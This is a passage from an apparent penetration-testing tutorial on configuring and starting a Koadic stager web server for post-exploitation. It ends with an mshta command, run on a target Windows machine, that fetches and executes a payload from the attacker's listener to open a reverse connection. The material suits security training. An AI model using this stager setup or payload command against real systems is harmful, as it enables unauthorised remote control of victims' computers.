Stager establishment

You need to first configure the stager and get it ready, which can be done by first setting up the details that are required by the stager. For getting the details, you can execute the following command:

info 

This will show the information for the current stager, which can be changed according to the needs:

We can change the settings using the set command (the same as Metasploit and Empire). In this case, we will be changing the stager web server port to 8080 by executing the following command:

set SRVPORT 8080 

Now the stager is ready to listen on port 8080 for reverse connections. To start with the stager web server, we need to run the server by executing the run command:

Run

The stager web server is successfully started on the local IP 192.168.10.122 and port 8080. Koadic also provides a command (mshta http://192.168.10.122:8080/MDRV9), which needs to be executed on the target Windows system. As mentioned before, this tool is not about enumeration or exploitation; it's all about post-exploitation. But this tool can be used in exploitation when trying to deliver the payload.